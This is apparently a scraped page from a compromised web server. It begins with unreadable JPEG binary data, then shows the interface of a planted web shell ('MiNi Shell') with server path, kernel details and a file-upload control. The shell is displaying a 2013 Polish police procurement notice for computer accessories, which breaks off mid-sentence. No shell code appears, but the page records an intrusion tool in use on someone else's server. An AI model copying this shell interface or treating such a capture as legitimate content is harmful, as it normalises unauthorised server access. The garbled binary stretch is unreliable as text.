JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130509/183468-N-2013.html

<p class="kh_header"><b>Katowice: Zakup akcesorii komputerowych</b><br>
<b>Numer ogłoszenia: 183468 - 2013; data zamieszczenia: 09.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji w Katowicach , ul. J. Lompy 19, 40-038 Katowice, woj. śląskie, tel. 032 2002050, faks 032 2002060.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.katowice.kwp.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup akcesorii komputerowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem umowy jest sprzedaż i dostawa na rzecz Zamawiającego akcesorii komputerowych określonych w załączniku nr 3 do ogłoszenia - formularz cenowy. 
2. Szczegółowy opis przedmiotu zamówienia został opisany w załączniku nr 2 ogłoszenia - projekt umowy. 
3. Zamawiający żąda aby procesor wskazany w pozycji 71 formularza cenowego - PROCESOR BOX wraz z dedykowanym przez producenta chłodzeniem posiadał wydajności min 1745 pkt w teście PassMark http://cpubenchmark.net (testy z 2013-03-20). niniejszy test stanowi załącznik nr 4 do ogłoszenia
4.Wykonawca może powierzyć wykonanie zamówienia
podwykonawcom. Na wniosku o dopuszczenie do udziału w postępowaniu Wykonawca składa oświadczenie
wskazujące zakres robót, jaki będzie realizował przy udziale podwykonawcy/ów. 
5. W przypadku Wykonawców ubiegających się wspólnie (konsorcjum) o udzielenie zamówienia publicznego niezbędnym
jest wskazanie we wniosku o dopuszczenie do udziału w postępowaniu, jaki zakres rzeczowy przedmiotu
zamówienia będzie realizował każdy z uczestników konsorcjum 
6.Jednocześnie Zamawiający przewiduje w
ramach zamówienia opcję zwiększenia ilości zakupywanych akcesorii komputerowy Ilość akcesorii zakupionych w ramach opcji będzie wynikać z kwoty stanowiącej różnicę pomiędzy kwotą przewidzianą
przez Zamawiającego na realizację zamówienia, a najniższą ceną z licytacji elektronicznej. Cena
jednostkowa akcesoriów komputerowych zakupionych w ramach opcji będzie taka jak cena tych akcesoriów
wskazana w formularzu cenowy. Dostawa akcesorii zakupionych w ramach opcji
będzie musiała się odbyć w terminie określonym dla realizacji niniejszego zamówienia tj. w terminie 10 dni
od dnia zawarcia umowy. Tym samym Wykonawcy nie będzie przysługiwał dodatkowy czas na realizację
zamówienia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.23.71.00-0.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1 Oświadczenie, Wykonawcy, który wygra licytację o udzieleniu gwarancji na dostarczony asortyment  złożone na załączniku nr 5 do ogłoszenia. 2
Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, przed zawarciem umowy dostarczy Zamawiającemu formularz ofertowy oraz formularz cenowy.
3 W przypadku, gdy Wykonawca powierzy wykonanie zamówienia podwykonawcy/om
oświadczenie Wykonawcy wskazujące, jaki zakres zamówienia będzie realizował przy
udziale podwykonawcy/ów złożone na załączniku nr 1 i 5 do ogłoszenia. 4 W przypadku
Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego (np.
konsorcjum) oświadczenie Wykonawców jaki zakres rzeczowy przedmiotu zamówienia
będzie realizował każdy z Wykonawców występujących wspólnie, złożone na odrębnym
dokumencie.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> https://licytacje.uzp.gov.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> http://bip.katowice.kwp.policja.gov.pl</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1. Wymagania
formalne: 1.1. Licytacja prowadzona będzie na platformie Urzędu Zamówień Publicznych
znajdującej się na stronie https://licytacje.uzp.gov.pl 1.2. Z platformy w pełnym zakresie mogą
korzystać wyłącznie Wykonawcy zarejestrowani w systemie pod adresem
https://licytacje.uzp.gov.pl 1.3. Wykonawca, aby umożliwić Zamawiającemu dopuszczenie go do
udziału w licytacji, winien wraz z wnioskiem o dopuszczenie go do udziału w licytacji przekazać
informację o swoim loginie. Login winien być przekazany Zamawiającemu w oryginalnej pisowni
tzn. z zachowaniem pisowni dużych i małych liter, numerów, spacji itp. 1.4. W przypadku podania
przez Wykonawcę niewłaściwego loginu bądź nie przekazania go Zamawiającemu wraz z
wnioskiem, Zamawiający dopuszcza przekazanie loginu najpóźniej dwa dni przed terminem
otwarcia licytacji. Brak loginu bądź brak poprawnego loginu będzie skutkowało brakiem
możliwości wzięcia udziału Wykonawcy w licytacji. 2. Wymagania techniczne: Komputer klasy PC
(lub równoważnej) spełniający wymogi techniczne określone przez producentów przeglądarek
internetowych Ms Internet Explorer w wersji 6.0 lub wyższej albo Mozilla Firefox w wersji 2.0 lub
wyższej, z zainstalowaną jedną z ww. przeglądarek lub przeglądarką równoważną, podłączony do
sieci Internet.</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1. Licytacja elektroniczna na: zakup akcesorii komputerowych 2. Po
zalogowaniu się na platformie, Wykonawcy dopuszczeni do udziału w licytacji uzyskują dostęp do
aplikacji umożliwiającej składanie ofert. Wykonawcy składają swoje oferty cenowe w postaci
elektronicznej. 3. W toku licytacji elektronicznej wykonawcy dopuszczeni do udziału w licytacji
składają kolejne korzystniejsze postąpienia. Możliwość złożenia postąpienia istnieje od otwarcia
licytacji do jej zamknięcia. 4. Oferta złożona w toku licytacji przestaje wiązać gdy inny
Wykonawca złożył ofertę korzystniejszą. 5. W toku licytacji Wykonawcy proponują rzeczywistą
cenę oferty brutto wyrażoną w złotych oraz ewentualnie w groszach; grosze należy oddzielić od
złotych kropką. 6.Cenę oferty brutto stanowi
łączny koszt wykonania zamówienia obejmujący cały asortyment z kosztami dostaw oraz inne koszty z tym
związane. Przed przystąpieniem do złożenia postąpienia Wykonawca winien obliczyć cenę oferty tak, aby
ceny jednostkowe wymnożone przez ilości po zsumowaniu wszystkich pozycji dawały wylicytowaną wartość
brutto. 7. Oferta złożona przez Wykonawcę winna być niższa od oferty najkorzystniejszej co najmniej o
kwotę minimalnego postąpienia. 8. Zamawiający przyjął za minimalne postąpienie wartość 200,00 PLN.
System nie przyjmie postąpienia, którego wysokość jest mniejsza od określonego minimalnego postąpienia.
9. W toku licytacji system na bieżąco udostępnia wszystkim Wykonawcom informacje o pozycji złożonych
przez nich ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, a także o cenach złożonych
ofert, z tym że do momentu zamknięcia licytacji nie ujawnia się informacji umożliwiających identyfikację
Wykonawców. 10. Zamawiający przyjął za cenę wywoławczą brutto za całość zamówienia i koszty związane
i dostawami przedmiotu zamówienia w wysokości 167.029,31 PLN 11. Zamawiający udzieli zamówienia
Wykonawcy, który zaoferuje najniższą cenę brutto. W przypadku podania w trakcie licytacji ceny, której nie
da się przeliczyć przez ilość zamawianego asortymentu wskazaną w załączniku nr 1 do ogłoszenia
Wykonawca w trakcie wypełniania formularza ofertowego zobowiązany jest do prawidłowego przeliczenia
ceny, przy czym wartość zaoferowanego asortymentu nie może przekroczyć ceny, wylicytowanej w trakcie
licytacji elektroniczne.</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 10 minut od ostatniego postąpienia</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 20.05.2013 godzina 10:00, miejsce: Komenda Wojewódzka Policji w Katowicach 40-038 Katowice
ul. Lompy 19. Zespół Zamówień Publicznych KWP blok C piętro VII pokój 735.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> 5 dni od dnia przekazania Wykonawcom
zaproszenia do składania ofert, godz. 10:00.</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Licytacja zostanie zamknięta jeżeli w ciągu 10min od złożenia najkorzystniejszego postąpienia,
żaden z Wyk. nie złoży korzystniejszego postąpienia lub gdy w okresie 10min od otwarcia licytacji
nie zostanie złożone żadne postąpienie</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Szczegółowe warunki umowy zawarte są w załączonym projekcie umowy w załączniku nr 2 do
ogłoszenia dostępnym na stronie www.bip.katowice.kwp.policja.gov.pl</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> CENA: Wykonawca, który wygra licytację, przed zawarciem umowy wypełni Formularz ofertowy - załącznik nr 5 do ogłoszenia dostępny na stronie http://bip.katowice.kwp.policja.gov.pl oraz załącznik nr 3 do ogłoszenia - formularz cenowy, dostępny na stronie http://bip.katowice.kwp.policja.gov.pl, podając w nim ceny jednostkowe brutto dla każdej pozycji poszczególnego asortymentu (sztukę,opakowanie), które po wymnożeniu przez ilości i zsumowaniu wszystkich wartości pozycji dadzą wylicytowaną cenę oferty brutto. Formularz cenowy stanowić będzie załącznik do
umowy PRZEKAZANIE WNIOSKU O DOPUSZCZENIE DO UDZIAŁU W LICYTACJI: 1.Wniosek ma być złożony w zamkniętej, zabezpieczonej kopercie (kopertach) nie jest dopuszczalne złożenie wniosku w formie elektroniczne - za sposób zabezpieczenia kopert/y odpowiada Wykonawca. 2. Koperta ma być zaadresowana na Zamawiającego i oznaczona: ZP-2380-247/13 Wniosek o dopuszczenie do udziału w licytacji elektronicznej na zakup akcesorii komputerowanych. Adres Zamawiającego: Komenda Wojewódzka Policji w Katowicach Zespół Zamówień Publicznych 40-038 Katowice ul. J. Lompy 19 blok C piętro VII pokój 735 Nie otwierać przed komisyjnym otwarciem wniosków 3. Ponadto koperta winna spełniać warunek uniemożliwiający odczytanie jej zawartości i oznaczona nazwą (firmą) i adresem Wykonawcy z uwagi na pkt. 4.  4. Wnioski złożone po terminie nie będą rozpatrywane. Wszystkie wnioski otrzymane po terminie składania zostaną zwrócone Wykonawcom po upływie ostatecznego terminu składania wniosków. OPIS SPOSOBU PRZYGOTOWANIA WNIOSKÓW: 1. Wykonawca składa: wypełniony wniosek o dopuszczenie do udziału w postępowaniu wg. wzoru załącznika nr 1 do ogłoszenia oraz dokumenty i załączniki wskazane w Sekcji III.6 ogłoszenia 2. Wniosek o dopuszczenie do udziału w postępowaniu oraz wszystkie załączniki w tym dokumenty i oświadczenia, mają być w całości sporządzone w języku polskim, ręcznie, na maszynie do pisania lub komputerze (w sposób czytelny) oraz podpisany w sposób określony pkt. 3 przez osoby uprawnione (podpisujące wniosek). Osoba uprawniona to osoba, która jest wymieniona w aktualnym odpisie z właściwego rejestru lub działająca z jej upoważnienia. 3. Wszystkie dokumenty w złożonym wniosku muszą być opieczętowane pieczątką imienną i podpisane lub podpisane czytelnie przez osoby uprawnione i opieczętowane pieczęciami firmowymi lub
sporządzone na papierze firmowym i podpisane czytelnie przez osoby uprawnione. Nie dotyczy załączników składanych jako oryginały wystawione i podpisane przez uprawnione organy np. ZUS.
Dokumenty wielostronicowe mogą być opieczętowane pieczątką imienną i podpisane lub podpisane czytelnie przez osoby uprawnione i opieczętowane pieczęciami firmowymi lub sporządzone na
papierze firmowym i podpisane czytelnie przez osoby uprawnione na pierwszej lub ostatniej jego stronie. Dokumenty mogą być składane w formie oryginału lub kserokopii poświadczonej przez
Wykonawcę za zgodność z oryginałem. W przypadku składania dokumentów wydanych w języku innym niż język polski, dokumenty te są składane wraz z tłumaczeniem na język polski,
poświadczonym przez Wykonawcę. Uwaga: Przez podpis czytelny Zamawiający rozumie podpis odręczny, zawierający imię i nazwisko pozwalający na identyfikację osoby, która go złożyła. 4. W
przypadku podpisywania wniosku przez osobę nie wymienioną w aktualnym odpisie z właściwego rejestru,niezbędne jest we wniosku pełnomocnictwo dla osoby działającej w imieniu Wykonawcy w
formie oryginału lub jego poświadczonej notarialnie kopii. Pełnomocnictwo w sposób jednoznaczny ma określać, do jakich czynności upoważniona jest osoba podpisująca wniosek o
dopuszczenie do udziału w postępowaniu. 5. W przypadku Wykonawców ubiegających się wspólnie (konsorcjum) o udzielenie zamówienia publicznego na podstawie art. 23 ust. 2 ustawy
PZP wynika obowiązek ustanowienia pełnomocnika do reprezentowania ich w prowadzonym postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. W związku z
powyższym niezbędne jest przedłożenie w wniosku pełnomocnictwa w formie oryginału lub jego poświadczonej notarialnie kopii w celu ustalenia podmiotu uprawnionego do występowania w
imieniu grupy Wykonawców w sposób umożliwiający identyfikację Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Uwaga: W przypadku spółki cywilnej, wspólnicy nie
przedstawiają osobnego dokumentu zawierającego pełnomocnictwo, jednakże uprawnienia do reprezentacji spółki przysługujące każdemu ze wspólników ma wynikać z samej umowy spółki
cywilnej dołączonej do wniosku. 6. Wszelkie miejsca, w których Wykonawca naniósł poprawki, zmiany muszą być parafowane przez osobę podpisującą wniosek (osobę uprawnioną). 7. Wszelkie
dokumenty składane na papierze światłoczułym uznane zostaną za nieważne. 8. Wnioski o dopuszczenie do udziału w postępowaniu są jawne od dnia poinformowania o wynikach oceny
spełniania warunków udziału w postępowaniu art. 96 ust 3. Nie ujawnia się informacji umożliwiających identyfikację Wykonawcy podczas licytacji (login) aż do momentu jej zamknięcia oraz informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli Wykonawca, nie później niż w terminie składania wniosku
zastrzegł, że nie mogą być one udostępniane. 9. Jeżeli Wykonawca chce zastrzec strony ww. wniosku wówczas składa je w dodatkowej zabezpieczonej kopercie, z opisem INFORMACJE
STANOWIĄCE TAJEMNICĘ PRZEDSIĘBIORSTWA. 10. Podmiot prowadzący działalność gospodarczą jako osoba fizyczna, osoba prawna albo jednostka organizacyjna nie posiadająca
osobowości prawnej, może złożyć tylko jeden wniosek o dopuszczenie do udziału w postępowaniu, sam lub jako Partner Konsorcjum firm. 11. W przypadku złożenia przez jednego Wykonawcę dwóch lub więcej wniosków o dopuszczenie do udziału w postępowaniu Zamawiający uzna złożenie wniosku za ważne i dopuści Wykonawcę do udziału w postępowaniu na podstawie
wszystkich złożonych wniosków. ISTOTNE DLA STRON POSTANOWIENIA, KTÓRE ZOSTANĄ WPROWADZONE DO TREŚCI ZAWIERANEJ UMOWY W SPRAWIE
ZAMÓWIENIA PUBLICZNEGO Szczegółowe warunki umowy zawarte są w załączonym projekcie umowy w załączniku nr 2 do ogłoszenia dostępnym na stronie
www.bip.katowice.kwp.policja.gov.pl INFORMACJA O FORMALNOŚCIACH, JAKIE POWINNY ZOSTAĆ DOPEŁNIONE PO PRZEPROWADZENIU LICYTACJI W CELU
ZAWARCIA UMOWY W SPRAWIE ZAMÓWIENIA PUBLICZNEGO. 1. Przed podpisaniem umowy Wykonawca dostarcza Zamawiającemu wypełniony formularz ofertowy stanowiący
załącznik nr 5 do ogłoszenia dostępny na stronie www.bip.katowice.kwp.policja.gov.pl oraz
formularz cenowy zgodnie z załącznika nr 3 do ogłoszenia dostępnego na stronie www.bip.katowice.kwp.policja.gov.pl. 2. Błędne wypełnienie
formularza ofertowego lub formularza cenowego będzie skutkowało wezwaniem Wykonawcy do przedłożenia prawidłowego formularza ofertowego i/lub formularza cenowego , a w przypadku odmowy jego poprawienia Zamawiający uzna, iż Wykonawca uchyla się od zawarcia umowy w sprawie zamówienia publicznego i będzie miał zastosowanie art 94 ust. 3 ustawy Prawo Zamówień
Publicznych. 3. W przypadku wygrania licytacji przez Wykonawcę będącego spółką z ograniczoną odpowiedzialnością, którego wartość oferty
przewyższa dwukrotnie wysokość kapitału zakładowego Wykonawca zobowiązany jest najpóźniej w dniu podpisania umowy do przedłożenia uchwały wspólników lub odpisu umowy spółki
wyrażającej zgodę na zaciągnięcie zobowiązania (art. 230 Kodeksu Spółek Handlowych). Powyższe dotyczy również Wykonawców ubiegających się wspólnie o udzielenie zamówienia
publicznego. 4. W przypadku wygrania licytacji przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego przed podpisaniem umowy konieczne jest przedłożenie umowy
konsorcjum, która będzie regulować wzajemną współpracę Wykonawców czyli zawierać postanowienia dotyczące m.in. realizacji poszczególnych części zamówienia, sposobu dokonywania
rozliczeń. Zgodnie z treścią art. 141 ustawy PZP Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. Zasady solidarnej
odpowiedzialności zostały uregulowane art. 366 § 1 Kodeksu cywilnego. Umowa regulująca współpracę podmiotów występujących wspólnie (konsorcjum) ma m.in.: - upoważniać jednego z
członków konsorcjum - Głównego Partnera - jako osobę prawną i reprezentującą go wskazaną osobę fizyczną, do występowania w imieniu każdego z pozostałych Partnerów we wszystkich
sprawach związanych z umową; - stwierdzać, że Partnerzy będą odpowiedzialni solidarnie za całość podjętych zobowiązań w ramach realizacji zamówienia; - być zawarta na czas trwania umowy, aż
do ostatecznego wygaśnięcia obowiązków i praw wobec Zamawiającego; - być zawarta w formie
pisemnej - określać zakres rzeczowo-finansowy każdego z członków konsorcjum  INFORMACJE O SPOSOBIE POROZUMIEWANIA SIĘ
ZAMAWIAJĄCEGO Z WYKONAWCAMI WRAZ ZE WSKAZANIEM PRZEZ
ZAMAWIAJĄCEGO OSÓB UPRAWNIONYCH DO POROZUMIEWANIA SIĘ Z
WYKONAWCAMI: 1. Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje
Zamawiający i Wykonawcy przekazują pisemnie do momentu otwarcia licytacji. Oświadczenia,
wnioski, zawiadomienia oraz informacje przekazane za pomocą faxu lub drogą elektroniczną uważa
się za złożone w terminie, jeżeli ich treść dotarła do adresata przed upływem terminu i została
niezwłocznie potwierdzona na piśmie (doręczone pocztą lub osobiście) na adres: Komenda
Wojewódzka Policji w Katowicach Zespół Zamówień Publicznych 40-038 Katowice ul. J. Lompy
19. (art. 27 ustawy Prawo Zamówień Publicznych). 2. Wykonawcy zobowiązani są do wskazania
we wniosku o dopuszczenie do udziału w postępowaniu stanowiącym załącznik nr 1 do ogłoszenia
numeru telefonu oraz numeru faksu lub adresu poczty elektronicznej, na który Zamawiający będzie
przesyłał Wykonawcy wszelkie pisma przekazywane w ramach postępowania. Wykonawca wybiera
faks albo pocztę elektroniczną według własnego uznania. W przypadku wpisania przez Wykonawcę
zarówno numeru faksu jak i adresu poczty elektronicznej Zamawiający będzie przesyłał
zeskanowane dokumenty pocztą elektroniczną. W przypadku wyboru przez Wykonawcę poczty
elektronicznej Wykonawca ponosi pełną odpowiedzialność za odbieranie przekazywanej poczty. W
przypadku zaniechania odebrania przekazanej poczty Wykonawca ponosi wszelkie wynikające z
